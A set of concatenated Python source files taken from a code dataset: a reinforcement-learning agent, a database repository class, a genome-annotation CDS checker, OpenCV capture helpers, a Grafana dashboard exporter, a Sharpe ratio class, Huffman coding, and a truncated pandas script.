def custom_loss(y_true, y_pred):\n out = K.clip(y_pred, 1e-12, 1-1e-12) # Numerical stability of log\n ll = y_true*K.log(out)\n return K.sum(-ll*advantages)\n\n policy = Model(input=[input, advantages], output=[probs])\n #policy.compile(optimizer=Adam(lr=self.lr2), loss=custom_loss)\n policy.compile(optimizer=\"rmsprop\", loss=custom_loss)\n\n predict = Model(input=[input], output=[probs])\n\n return policy, predict, value_nn\n\n def choose_action(self, state):\n state = state[np.newaxis, :]\n probabilities = self.predict_nn.predict(state)[0]\n action = np.random.choice(self.action_space, p=probabilities)\n return action\n\n def update_replay_memory(self, transition):\n self.REPLAY_MEMORY.append(transition)\n\n def store_transition(self, state, action, reward, next_state, done):\n self.states.append(state)\n self.actions.append(action)\n self.rewards.append(reward)\n self.next_states.append(next_state)\n self.update_replay_memory((state, action, reward, next_state, done))\n\n def clear_transitions(self):\n self.states, self.actions, self.rewards, self.next_states = [], [], [], []\n\n def learn(self):\n state_memory = np.array(self.states)\n action_memory = np.array(self.actions)\n reward_memory = np.array(self.rewards)\n next_state_memory = np.array(self.next_states)\n discount_filter_n = np.flip(self.gamma ** np.arange(0, self.n_steps))\n G_n = np.convolve(reward_memory, discount_filter_n)[-reward_memory.shape[0]:] # n-step return before value fn.\n discount_filter_inf = np.flip(self.gamma ** np.arange(0, reward_memory.shape[0]))\n G_inf = np.convolve(reward_memory, discount_filter_inf)[-reward_memory.shape[0]:] # Total discounted return\n # Append zeros for last n states, v(s_end) = 0\n state_vals = np.hstack((np.squeeze(self.value_nn.predict(state_memory[self.n_steps:])), np.zeros(self.n_steps)))\n G_n += (self.gamma**self.n_steps)*state_vals # n-step value function added to give full n-step return\n\n # One hot encoding of actions\n actions = np.zeros([len(action_memory), self.n_outputs])\n actions[np.arange(len(action_memory)), action_memory] = 1\n\n # n step actor-critic td errors as in Sutton-Barto\n td_errors = G_n - 
np.squeeze(self.value_nn.predict(state_memory))\n\n self.value_nn.fit(state_memory, G_n, batch_size=int(len(state_memory)//10), shuffle=True, verbose=0)\n self.policy_nn.fit([state_memory, td_errors], actions, batch_size=int(len(state_memory)//10), shuffle=True, verbose=0)\n\n self.clear_transitions()\n return\n\n def update_stats(self, score):\n self.scores.append(score)\n\n def train_value_fn(self, terminal_state):\n if len(self.REPLAY_MEMORY) < self.MIN_REPLAY_MEMORY_SIZE:\n return\n\n minibatch = np.array(random.sample(self.REPLAY_MEMORY, self.MINIBATCH_SIZE))\n expand = lambda x: np.stack(x, axis=0)\n current_states = expand(minibatch[:, 0])\n rewards = expand(minibatch[:, 2])\n new_states = expand(minibatch[:, 3])\n end_states = expand(minibatch[:, 4]) # Value should be zero for end state.\n\n value_targets = rewards + self.gamma*np.squeeze(self.target_value_nn.predict(new_states))*(1-end_states)\n\n self.value_nn.fit(current_states, value_targets, batch_size=self.MINIBATCH_SIZE, verbose=0, shuffle=False)\n\n # Determine if we want to update target_model\n if terminal_state:\n self.target_update_counter += 1\n\n if self.target_update_counter > self.UPDATE_TARGET_EVERY:\n self.target_value_nn.set_weights(self.value_nn.get_weights()) # Synchronise neural nets\n self.target_update_counter = 0\n\n def save_model(self, name):\n self.policy_nn.save_weights(\"{}/PolicyNN-weights.h5\".format(name))\n self.predict_nn.save_weights(\"{}/PredictNN-weights.h5\".format(name))\n if self.value_nn:\n self.value_nn.save_weights(\"{}/ValueNN-weights.h5\".format(name))\n return 'Saved model weights'\n\n def save_all(self, name):\n if not os.path.isdir(self.env_name):\n os.makedirs(self.env_name)\n subdir_name = \"/\".join([self.env_name, name])\n if not os.path.isdir(subdir_name):\n os.makedirs(subdir_name)\n #pickle.dump(self.weights1, open(f\"{subdir_name}/weights1.p\", \"wb\"))\n #pickle.dump(self.weights2, open(f\"{subdir_name}/weights2.p\", \"wb\"))\n pickle.dump(self.scores, open(\"{}/scores.p\".format(subdir_name), \"wb\"))\n with open(\"{}/specs.txt\".format(subdir_name), \"a\") as text_file:\n #text_file.write(\"lr = {}\\n\".format(self.lr))\n text_file.write(\"gamma = {}\\n\".format(self.gamma))\n text_file.write(\"n_steps = {}\\n\".format(self.n_steps))\n self.save_model(subdir_name)\n\n\ndef main(EPISODES=3000, LOAD_MODEL=None, save_name=None, n_steps=5, gamma=0.99, seed=1):\n env = gym.make('LunarLander-v2')\n np.random.seed(seed)\n env.seed(seed)\n # LOAD_MODEL = \"NB0.99\"\n agent = PolicyEstimator(env, LOAD_MODEL, gamma, n_steps)\n\n # Iterate over episodes\n\n steps = []\n scores = []\n for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):\n show = False\n if not episode % (EPISODES//10) and LOAD_MODEL:\n show = True\n current_state = env.reset()\n score, no_steps, discount = 0, 0, 1\n # Reset flag and start iterating until episode ends\n done = False\n start = timer()\n discounted_sum = 0\n while not done:\n action = agent.choose_action(current_state)\n next_state, reward, done, _ = env.step(action)\n\n if show:\n env.render()\n agent.store_transition(current_state, action, reward, next_state, done)\n #if random.random() < 0.5:\n # agent.train(done)\n current_state = next_state\n score += reward\n no_steps += 1 # Max steps\n agent.update_stats(score)\n ep_time = timer() - start\n steps.append(no_steps)\n scores.append(score)\n start = timer()\n agent.learn()\n training_time = timer() - start\n if score > 200:\n print(\"Solved on episode {}\".format(episode))\n if 
not episode % 10:\n print(ep_time, \"seconds of episode\")\n print(training_time, \"to train\")\n print(\"{} score, mean score {}, {} mean no. steps\".format(score, np.mean(scores[-50:]), np.mean(steps[-50:])))\n if save_name:\n agent.save_all(save_name)\n\n\nif __name__ == \"__main__\":\n n_steps, gamma = 10, 0.99\n load_model, save_model = \"AC99\", None\n load_model, save_model = None, \"AC-10-99\"\n main(1000, load_model, save_model, n_steps=n_steps, gamma=gamma)\n","sub_path":"ModelFree/ActorCritic/nStepAC.py","file_name":"nStepAC.py","file_ext":"py","file_size_in_byte":9876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509988232","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis class represents a Repository - a layer that works with database\n\"\"\"\n\nimport mysql.connector\n\nfrom config import MYSQL_SETTINGS as db_setting\n\n\nclass BaseRepository(object):\n \"\"\"\n This is base class for Repository pattern\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n self.connection = mysql.connector.connect(**db_setting)\n self._completed = False\n\n def __enter__(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"\n\n :param exc_type:\n :type exc_type:\n :param exc_val:\n :type exc_val:\n :param exc_tb:\n :type exc_tb:\n :return:\n :rtype:\n \"\"\"\n self.close()\n\n def complete(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n self._completed = True\n\n def close(self):\n \"\"\"\n\n :return:\n :rtype:\n \"\"\"\n if self.connection:\n try:\n if self._completed:\n self.connection.commit()\n else:\n self.connection.rollback()\n except Exception as e:\n raise e\n finally:\n try:\n self.connection.close()\n except Exception as e:\n raise e","sub_path":"synergy/repository/baserepository.py","file_name":"baserepository.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126287450","text":"#!/usr/bin/env python\n\"\"\"Make a lookup table of CDS features for each gene in the Northern Wild Rice\ngenome annotation that contains information for making the NCBI feature table.\nThis script will extract the sequence and check it for completeness: length is\na multiple of three, first codon is Met, final codon is Stop. Requires\nBiopython. 
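# A toy check of the coordinate handling parse_gff relies on below: GFF3
# start/end are 1-based inclusive, Biopython's FeatureLocation is 0-based
# half-open, hence FeatureLocation(int(start) - 1, int(end)); extract() also
# reverse-complements when strand=-1. The scaffold sequence here is made up.
from Bio.Seq import Seq
from Bio.SeqFeature import SeqFeature, FeatureLocation

scaffold = Seq("GGGATGAAATGACCC")
# A CDS reported in GFF3 as start=4, end=12 on the + strand:
feat = SeqFeature(FeatureLocation(4 - 1, 12, strand=1), type="CDS")
cds = feat.extract(scaffold)
assert str(cds) == "ATGAAATGA"
assert str(cds.translate(table=1)) == "MK*"   # Met start, single trailing Stop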
Takes two arguments:\n 1) GFF3\n 2) FASTA\"\"\"\n\nimport sys\nimport gzip\nimport re\ntry:\n from Bio import SeqIO\n from Bio.Seq import Seq\n from Bio.SeqFeature import SeqFeature\n from Bio.SeqFeature import FeatureLocation, CompoundLocation\nexcept ImportError:\n sys.stderr.write('This script requires Biopython.\\n')\n sys.exit(1)\n\n# Set arguments\ntry:\n gff_in = sys.argv[1]\n fasta_in = sys.argv[2]\nexcept IndexError:\n sys.stderr.write(__doc__ + '\\n')\n sys.exit(1)\n\n\ndef parse_gff(g):\n \"\"\"Parse the GFF file, and return two dictionaries that describe the\n features and the parent/child relationships.\"\"\"\n # We also want to store the mRNA->gene information!\n mrna_par = {}\n # And the CDS->mRNA information\n cds_dat = {}\n with open(g, 'r') as f:\n for line in f:\n # if the line is empty or starts with a #, we will skip it\n if line.startswith('#') or line == '\\n':\n continue\n else:\n tmp = line.strip().split('\\t')\n feat_type = tmp[2]\n if feat_type == 'mRNA':\n meta = tmp[8].split(';')\n for m in meta:\n if m.startswith('ID='):\n tx_id = m.split('=')[1]\n if m.startswith('Parent='):\n tx_par = m.split('=')[1]\n mrna_par[tx_id] = tx_par\n elif feat_type == 'CDS':\n scaf = tmp[0]\n start = tmp[3]\n end = tmp[4]\n strand = tmp[6]\n phase = tmp[7]\n meta = tmp[8].split(';')\n for m in meta:\n if m.startswith('ID='):\n cds_id = m.split('=')[1]\n if m.startswith('Parent='):\n cds_par = m.split('=')[1]\n if strand == '-':\n strand = -1\n else:\n strand = 1\n # Watch out for transcripts where there are multiple CDS.\n # This will require a nested dictionary of lists.\n if cds_par in cds_dat:\n pass\n else:\n cds_dat[cds_par] = {}\n if cds_id in cds_dat[cds_par]:\n pass\n else:\n cds_dat[cds_par][cds_id] = []\n # We want to make a SequenceFeature for each CDS chunk\n # Keep in mind that GFF is 1-based, so we have to adjust\n # the start position!\n cds_feat = SeqFeature(\n FeatureLocation(int(start)-1, int(end), strand=strand),\n type=\"CDS\",\n id=cds_id)\n # Add some qualifiers to modify the behavior\n # Use the \"standard\" genetic code from NCBI\n cds_feat.qualifiers['transl_tabl'] = [1]\n # Then, append it into the corresponding dictionary item\n # keeping the chromosome (scaffold) name and phase with it\n cds_dat[cds_par][cds_id].append((cds_feat, scaf, phase))\n else:\n continue\n return (mrna_par, cds_dat)\n\n\ndef combine_features(c_dat):\n \"\"\"Step through the CDS dictionary and process it down by combining pieces\n that had to be listed as separate chunks in the GFF.\"\"\"\n # They are keyed on transcript ID\n for tx in c_dat:\n for cds in c_dat[tx]:\n cds_pieces = c_dat[tx][cds]\n # If there fewer than 2 CDS chunks, then pull the tuple out of the\n # list.\n if len(cds_pieces) < 2:\n c_dat[tx][cds] = cds_pieces[0]\n else:\n # Join pieces\n locs = []\n ph = []\n for chunk in cds_pieces:\n c_loc = FeatureLocation(\n chunk[0].location.start,\n chunk[0].location.end,\n strand=chunk[0].strand)\n locs.append(c_loc)\n ph.append(chunk[2])\n # Sort them, according to strand. 
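Plus-strand pieces are sorted by\n # ascending start; minus-strand pieces by descending end. 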
We assume that a CDS is not a\n # mixed-strand feature\n if cds_pieces[0][0].strand == 1:\n locs.sort(key=lambda x: x.start)\n else:\n locs.sort(key=lambda x: x.end, reverse=True)\n # Join them into a CompoundLocation\n full_loc = CompoundLocation(locs)\n # And then overwrite the input dictionary values\n full_feat = SeqFeature(full_loc, type='CDS',\n id=cds_pieces[0][0].id)\n full_feat.qualifiers['transl_tabl'] = [1]\n # Keep the phases!\n c_dat[tx][cds] = (full_feat, cds_pieces[0][1], ph)\n return c_dat\n\n\ndef process_cds(cfs, ref):\n \"\"\"Extract the coding sequence from the given reference sequence and\n process it. This is where we will apply our rules for length/etc.\"\"\"\n # unpack the tuple\n feat, scaffold, phase = cfs\n # First, extract the sequence of the CDS from the scaffold. This should\n # respect the strand, so we won't have to reverse-complement\n featseq = feat.extract(ref[scaffold])\n # Calculate the length of the codon-containing sequence\n cdslen = len(featseq)\n # Run a check to see if it is a multiple of 3 or not\n if cdslen % 3 == 0:\n mult_three = True\n else:\n mult_three = False\n # We want to take the phase of the first piece of the CDS and remove that\n # number of bases from the beginning. For some reason, it looks like the\n # phase is messed up here - 2 should be 1 and 1 should be 2?\n first_phase = int(phase[0])\n if first_phase == 2:\n first_phase = 1\n elif first_phase == 1:\n first_phase = 2\n # Save the updated phases\n new_phases = []\n for idx, p in enumerate(phase):\n if idx == 0:\n new_phases.append(str(first_phase))\n else:\n new_phases.append(p)\n featseq = featseq[first_phase:]\n # Then we will translate it\n cds_trans = featseq.translate(table=1)\n # How many parts does the CDS have?\n cds_numparts = str(len(feat.location.parts))\n # Extract the start positions and end positions\n cds_starts = [str(x.start) for x in feat.location.parts]\n cds_ends = [str(x.end) for x in feat.location.parts]\n # Check for 5-prime partial CDS\n if str(cds_trans.seq).startswith('M'):\n fiveprime_part = False\n else:\n fiveprime_part = True\n # Check for 3-prime partial CDS\n if str(cds_trans.seq).endswith('*'):\n threeprime_part = False\n else:\n threeprime_part = True\n # Let's do a thing where we check if the next triplet would be a stop\n # codon.\n if threeprime_part:\n # Adjust the positions by one codon, according to the strand\n if feat.strand == 1:\n newstart = feat.location.start\n newend = feat.location.end + 3\n else:\n newstart = feat.location.start - 3\n newend = feat.location.end\n # Make a new feature and set the qualifiers\n new_feat = SeqFeature(\n FeatureLocation(newstart, newend, strand=feat.strand),\n type=\"CDS\",\n id=feat.id)\n new_feat.qualifiers['transl_tabl'] = [1]\n # Extract and translate it, mirroring the extract/translate pattern above\n new_trans = new_feat.extract(ref[scaffold]).translate(table=1)\n # Check if it ends in a stop\n if str(new_trans.seq).endswith('*'):\n next_codon_is_stop = True\n else:\n next_codon_is_stop = False\n else:\n next_codon_is_stop = 'NA'\n # Lastly, check for internal stop codons\n internal_stop_re = re.compile(r'^[^\\*].+\\*.+[^\\*]$')\n if internal_stop_re.match(str(cds_trans.seq)):\n has_i_stop = True\n else:\n has_i_stop = False\n cds_flags = (mult_three, fiveprime_part, threeprime_part, has_i_stop,\n cds_trans, cds_numparts, next_codon_is_stop, cdslen,\n cds_starts, cds_ends, new_phases)\n return cds_flags\n\n\ndef main(gff, fa):\n \"\"\"Main function.\"\"\"\n # First, we want to parse the GFF3 and store it in memory.\n tx_gene, cds_features = parse_gff(gff)\n # Then we 
process the CDS dictionary to make complete CDS features for\n # every transcript\n cds_features = combine_features(cds_features)\n # Read the reference genome into memory\n ref = SeqIO.to_dict(SeqIO.parse(fa, 'fasta'))\n # Print a header!\n header = ['CDS.ID', 'Chunk.Num.Parts', 'CDS.Len', 'Tx.ID', 'Gene.ID',\n 'Scaffold', 'Starts', 'Ends', 'Strand', 'Phase', 'Mult.Three',\n '5prime.Partial', '3prime.Partial', 'Next.Codon.is.Stop',\n 'Has.Internal.Stops', 'CDS.Trans']\n print('\\t'.join(header))\n # For each CDS feature, calculate its flags and then print it out. The\n # data are keyed on transcript ID\n for tx in cds_features:\n for cds in cds_features[tx]:\n # First, get the parent info\n parent_gene = tx_gene.get(tx, 'Unknown')\n # Classify the sequences\n cds_class = process_cds(cds_features[tx][cds], ref)\n phs = ','.join(cds_class[10])\n # Then print out the info! We will print it out in this order:\n # - CDS ID\n # - Number of CDS parts\n # - CDS length\n # - Parent transcript ID\n # - Parent gene ID\n # - Scaffold\n # - Start\n # - End\n # - Strand\n # - Phase\n # - Multiple of 3?\n # - 5-prime partial?\n # - 3-prime partial?\n # - Next codon is stop?\n # - Internal stops?\n # - Translated sequence\n cds_id = cds_features[tx][cds][0].id\n num_parts = cds_class[5]\n cds_len = str(cds_class[7])\n scaffold = cds_features[tx][cds][1]\n strand = str(cds_features[tx][cds][0].strand)\n transeq = str(cds_class[4].seq)\n internal_stop = str(cds_class[3])\n threeprime_part = cds_class[2]\n fiveprime_part = cds_class[1]\n mult_three = str(cds_class[0])\n next_is_stop = str(cds_class[6])\n # This is going to be a bit hairy! We will have to set the \"real\"\n # start and end based on the GFF positions and the reported strand\n # Then, if a feature is partial in one direction, we will have to\n # modify its start/end, but also keep in mind the strand, i.e., for\n # three-prime partial features, the *first* (sorted by coordinate)\n # feature will have to be modified. 
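NCBI feature tables mark\n # partial ends with '<' (5-prime) and '>' (3-prime) prefixes, which is\n # what is applied below. 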
Also remember to add 1 to the\n # gff_starts values to convert it back to 1-based coordinates!\n gff_starts = [str(int(i)+1) for i in cds_class[8]]\n gff_ends = cds_class[9]\n if strand == '1':\n real_starts = gff_starts\n real_ends = gff_ends\n else:\n real_starts = gff_ends\n real_ends = gff_starts\n\n # Check five-prime partialness.\n if fiveprime_part:\n real_starts[0] = '<' + real_starts[0]\n # And the threeprime partialness\n if threeprime_part:\n real_ends[-1] = '>' + real_ends[-1]\n # And turn the starts and stops into printable things\n p_starts = ','.join(real_starts)\n p_ends = ','.join(real_ends)\n toprint = [\n cds_id,\n num_parts,\n cds_len,\n tx,\n parent_gene,\n scaffold,\n p_starts,\n p_ends,\n strand,\n phs,\n mult_three,\n str(fiveprime_part),\n str(threeprime_part),\n next_is_stop,\n internal_stop,\n transeq]\n print('\\t'.join(toprint))\n return\n\n\nmain(gff_in, fasta_in)\n","sub_path":"MSI-RIS/Kimball_WR_Annotation/Scripts/Data_Handling/Classify_CDS_For_NCBI_Submission.py","file_name":"Classify_CDS_For_NCBI_Submission.py","file_ext":"py","file_size_in_byte":12622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"292237218","text":"import re\n\nhand = open('short.txt')\nnumlist = list()\n\nfor line in hand:\n line = line.rstrip()\n\n stuff = re.findall('^X-DSPAM-Confidence: ([0-9.]+)', line)\n if len(stuff) != 1:\n continue\n num = float(stuff[0])\n numlist.append(num)\nprint(f'Maximum:{max(numlist)}')\n\nx = 'We just received $10.00 for choice.'\ny = re.findall('\\$[0-9.]+',x)\nprint(y)\n\nx = 'From: Using the : character'\ny = re.findall('^F.+:', x)\nprint(y)\n\n","sub_path":"coursera/Python to Access Web Data/11_1_regular_expression_spam_confidence.py","file_name":"11_1_regular_expression_spam_confidence.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"507748648","text":"import cv2\nimport numpy as np\nimport time\n\n'''\nThis module handles capturing a video stream.\nThe CaptureManager class reads new frames and can dispatch each frame to one or more outputs: a still-image file, a video file, or a window.\n'''\nclass CaptureManager(object):\n\n def __init__(self,\n capture,\n previewWindowmanager = None,\n shouldMirroPreview = False):\n self.previewWindowManager = previewWindowmanager\n self.shouldMirroPreview = shouldMirroPreview\n\n self._capture = capture\n self._channel = 0\n self._enteredFrame = False\n self._frame = None\n self._imageFileName = None\n self._videoFileName = None\n self._videoEncoding = None\n self._videoWriter = None\n self._startTime = None\n self._framesElapsed = 0\n self._fpsEstimate = None\n\n '''@property is a decorator; decorators dynamically add behaviour to functions.\n The built-in @property decorator turns a method into an attribute-style accessor\n and checks the method's arguments when it is used.'''\n\n @property # define an inline getter\n def channel(self):\n return self._channel\n\n @channel.setter\n def channel(self, value):\n if self._channel != value:\n self._channel = value\n self._frame = None\n\n @property\n def frame(self):\n if self._enteredFrame and self._frame is None:\n _, self._frame = self._capture.retrieve()\n return self._frame\n\n @property\n def isWritingImage(self):\n return self._imageFileName is not None\n\n @property\n def isWritingVideo(self):\n return self._videoFileName is not None\n\n # Capture the next frame\n def enterFrame(self): # check that the previous frame was exited\n assert not self._enteredFrame, 'previous enterFrame() had no matching exitFrame()'\n\n if self._capture is not None:\n self._enteredFrame = self._capture.grab()\n\n #Draw to window,write to file,release the frame\n def exitFrame(self):\n if self.frame is None:\n 
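# Nothing was captured this cycle (grab() failed or no frame was\n # retrieved), so skip the timing, preview and file-writing steps below.\n 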
self._enteredFrame = False\n return\n if self._framesElapsed == 0:\n self._startTime = time.time()\n else:\n timeElapsed = time.time() - self._startTime\n self._fpsEstimate = self._framesElapsed / timeElapsed\n self._framesElapsed += 1\n\n '''Draw to window'''\n if self.previewWindowManager is not None:\n if self.shouldMirroPreview:\n mirroredFrame = np.fliplr(self._frame).copy()\n self.previewWindowManager.show(mirroredFrame)\n else:\n self.previewWindowManager.show(self._frame)\n\n '''write to image file'''\n if self.isWritingImage:\n cv2.imwrite(self._imageFileName, self._frame)\n self._imageFileName = None\n\n '''write to video'''\n if self.isWritingVideo:\n self._writeVideoFrame()\n #Release the frame\n self._frame = None\n self._enteredFrame = False\n\n def writeImage(self, filename):\n self._imageFileName = filename # write the next exited frame to an image file\n\n def startWriteVideo(self,\n filename,\n encoding = cv2.VideoWriter_fourcc('I','4','2','0')):\n self._videoFileName = filename\n self._videoEncoding = encoding\n\n def stopWriteVideo(self):\n self._videoFileName = None\n self._videoEncoding = None\n self._videoWriter = None\n\n '''_writeVideoFrame() creates the video file or appends frames to it'''\n def _writeVideoFrame(self):\n if not self.isWritingVideo:\n return\n\n if self._videoWriter is None:\n fps = self._capture.get(cv2.CAP_PROP_FPS)\n # The capture's FPS is unknown, so it has to be estimated (FPS: frames per second)\n if fps == 0.0:\n if self._fpsEstimate < 20: # wait 20 frames so the estimate is more accurate\n return\n else:\n fps = self._fpsEstimate\n size = (int(self._capture.get(\n cv2.CAP_PROP_FRAME_WIDTH)),\n int(self._capture.get(\n cv2.CAP_PROP_FRAME_HEIGHT)))\n self._videoWriter = cv2.VideoWriter(\n self._videoFileName,\n self._videoEncoding,\n fps,\n size)\n\n self._videoWriter.write(self._frame)\n\nclass windowManager(object):\n # This class abstracts a window and the keyboard\n def __init__(self,\n windowName,\n keyPressCallback = None):\n self.keypressCallback = keyPressCallback\n self._windowName = windowName\n self._isWindowCreated = False\n\n @property\n def isWindowCreated(self):\n return self._isWindowCreated\n\n def createWindow(self):\n cv2.namedWindow(self._windowName)\n self._isWindowCreated = True\n\n def show(self, frame):\n cv2.imshow(self._windowName, frame)\n\n def destoryWindow(self):\n cv2.destroyWindow(self._windowName)\n self._isWindowCreated = False\n\n def processEvents(self):\n keycode = cv2.waitKey(1)\n if self.keypressCallback is not None and keycode != -1:\n keycode &= 0xff\n self.keypressCallback(keycode)","sub_path":"openCV/Chapter3/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"625791685","text":"IMG_PATH = 'data/train/ship/'\nSEG_PATH = 'data/label/'\nSAVE_WEIGHTS_PATH = 'results/'\nSEG_FILE = 'data/train_ship_segmentations_v2.csv'\n\nTEST_IMG_PATH = 'data/train/ship/'\nSEG_RESULT_PATH = 'data/seg_results/'\nINTER_RESULT_PATH = 'data/inter_results/test/'\nSCORE_RESULT_PATH = 'data/score_results/'\n\nimg_size_ori = 768\nimg_size_target = 768\nbatch_size = 1 # 256:64, 384:32, 768:6(8)\nepochs = 10\n\nthreshold = 0.5\n\n","sub_path":"train_unet34_param.py","file_name":"train_unet34_param.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"416811576","text":"#!/usr/bin/env python\n\"\"\"\nPurpose: export all dashboards from grafana server\nAuthor: Margin Hu\nVersion: 1.0\n\"\"\"\n\nimport os,sys\nimport urllib2\nimport ConfigParser\nimport requests\nimport 
json\n\nclass grafana_portal:\n def __init__(self):\n self.key=\"\"\n self.url=\"\"\n\ndef modify_title(title):\n # str.replace returns a new string; build and return the sanitised title\n return title.replace(\" \",\"_\").replace(\":\",\"_\")\n\n\ndef config_parse(conf,gp):\n cf = ConfigParser.ConfigParser()\n cf.read(conf)\n gp.url = cf.get(\"grafana\",\"url\")\n gp.key = cf.get(\"grafana\",\"key\") \n\ndef get_dashboard_list(gp):\n url = gp.url+\"/api/search/\"\n print(\"url\",url)\n req = urllib2.Request(url)\n req.add_header(\"Authorization\",\"Bearer %s\"% gp.key)\n\n response = urllib2.urlopen(req)\n body = response.read()\n body_list= json.loads(body)\n print(body_list)\n return body_list\n\ndef export_dashboard(dash,gp):\n uid = dash['id']\n title=dash['title']\n uri = dash['uri']\n file_path=\"/tmp/dashboard/\" \n if not os.path.exists(file_path):\n os.makedirs(file_path)\n\n # sanitise the title so it is safe to use as a file name\n file_name=file_path+modify_title(title)\n \n url = gp.url+\"/api/dashboards/%s\"%uri\n print(\"uid=%d,url is:\"%uid, url)\n\n req = urllib2.Request(url)\n req.add_header(\"Authorization\",\"Bearer %s\"% gp.key)\n\n response = urllib2.urlopen(req)\n body = response.read()\n print(\"uid=%d,response is:\"%uid, body) \n\n with open(file_name,'w') as outfile:\n outfile.write(body)\n outfile.close()\n\n\ndef main():\n if (len(sys.argv) < 2):\n print(\"Usage: %s grafana.ini\"% sys.argv[0])\n return\n \n gp = grafana_portal()\n config_parse(sys.argv[1],gp) \n \n dlist = get_dashboard_list(gp) \n for dash in dlist:\n export_dashboard(dash,gp) \n\n\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n\n","sub_path":"grafana/grafana4.2/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"185497694","text":"import numpy as np\n\n\nclass SharpeRatio:\n def __init__(self, std_precision=1e-6):\n self.std_precision = std_precision\n self.num = None\n self.sum = None\n self.sqr_sum = None\n self.reset()\n\n def reset(self):\n self.num = 0\n self.sum = 0\n self.sqr_sum = 0\n\n def add(self, value):\n self.num += 1\n self.sum += value\n self.sqr_sum += value ** 2\n\n def get(self):\n assert self.num != 0, \"Need at least one number.\"\n mean = self.sum / self.num\n sqr_mean = self.sqr_sum / self.num\n s2 = sqr_mean - mean ** 2\n\n std = np.sqrt(s2) + self.std_precision\n return mean / std\n","sub_path":"utils/accum_sharpe_ratio.py","file_name":"accum_sharpe_ratio.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"112557238","text":"\n# Huffman Coding in python\n\n# Creating tree nodes\nclass NodeTree(object):\n\n def __init__(self, left=None, right=None):\n self.left = left\n self.right = right\n\n def children(self):\n return (self.left, self.right)\n\n def nodes(self):\n return (self.left, self.right)\n\n def __str__(self):\n return '%s_%s' % (self.left, self.right)\n\n\n# Main function implementing huffman coding\ndef huffman_code_tree(node, left=True, binString=''):\n if type(node) is str:\n return {node: binString}\n (l, r) = node.children()\n d = dict()\n d.update(huffman_code_tree(l, True, binString + '0'))\n d.update(huffman_code_tree(r, False, binString + '1'))\n return d\n\n \n# nodes = freq\n\n\n# while len(nodes) > 1:\n# (key1, c1) = nodes[-1]\n# (key2, c2) = nodes[-2]\n# nodes = nodes[:-2]\n# node = NodeTree(key1, key2)\n# nodes.append((node, c1 + c2))\n\n# nodes = sorted(nodes, key=lambda x: x[1], reverse=True)\n\n# huffmanCode = huffman_code_tree(nodes[0][0])\n\n\nclass Huffman:\n def 
__init__(self, fd):\n self.fd = fd\n \n\n def huffman_code_tree(self, node, left=True, binString=''):\n if type(node) is str:\n return {node: binString}\n (l, r) = node.children()\n d = dict()\n # recurse through the method itself rather than the module-level helper\n d.update(self.huffman_code_tree(l, True, binString + '0'))\n d.update(self.huffman_code_tree(r, False, binString + '1'))\n return d\n\n def sort(self):\n nodes = self.fd\n\n while len(nodes) > 1:\n (key1, c1) = nodes[-1]\n (key2, c2) = nodes[-2]\n nodes = nodes[:-2]\n node = NodeTree(key1, key2)\n nodes.append((node, c1 + c2))\n\n nodes = sorted(nodes, key=lambda x: x[1], reverse=True)\n\n return nodes\n \n def printCode(self, inputs, huffmanCode):\n \n print(' Char | Huffman code ')\n print('----------------------')\n for (char, frequency) in self.fd:\n print(' %-4r |%12s' % (char, huffmanCode[char]))\n for c in inputs:\n print(huffmanCode[c])\n","sub_path":"huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345096387","text":"import pandas as pd\r\nimport glob\r\nimport os\r\n\r\ndef twolist_to_list(lis):\r\n b = []\r\n for xs in lis:\r\n for x in xs:\r\n b.append(x)\r\n return b\r\ndef remove_save_file(p,path):\r\n if os.path.exists(path):\r\n os.remove(path)\r\n p.to_csv(path)\r\n else:\r\n p.to_csv(path)\r\n# Top10 = ['CPALL']\r\n# Top10 = ['ADVANC','DTAC','INTUCH','JAS','TRUE','CPALL','BBL','KBANK','KKP','KTB','SCB','TCAP','TISCO','TMB']\r\n# Top10 = ['ADVANC','DTAC','INTUCH','JAS','TRUE','CPALL','BBL','KBANK','KKP','KTB','SCB','TCAP','TISCO','TMB','BANPU','BCP','BCPG','BGRIM','BPP','CKP','EA','EGCO','ESSO','GPSC','GULF','GUNKUL','IRPC','PTG','PTT','PTTEP','RATCH','SGP','SPRC','SUPER','TOP','TPIPP','TTW','BCH','BDMS','BH','CHG']\r\nTop10 = ['BH','CPALL','INTUCH','KBANK','TOP']\r\n\r\n# Top10 = ['AOT','SCB','ADVANC','PTT','BDMS','CPALL']\r\nk=[]\r\nfor tag in Top10:\r\n print(tag)\r\n path = r'D:\\\\Program_code\\\\python\\\\Code_test\\\\stock_gap_NLP\\\\classification_report_combine' # use your path\r\n\r\n all_files = glob.glob(path +'\\\\'+ f'{tag}_*.csv') # method: normal\r\n # all_files = glob.glob(path +'\\\\'+ f'stopword_{tag}_*.csv')# method:stopword\r\n \r\n k.append(all_files)\r\n# path = 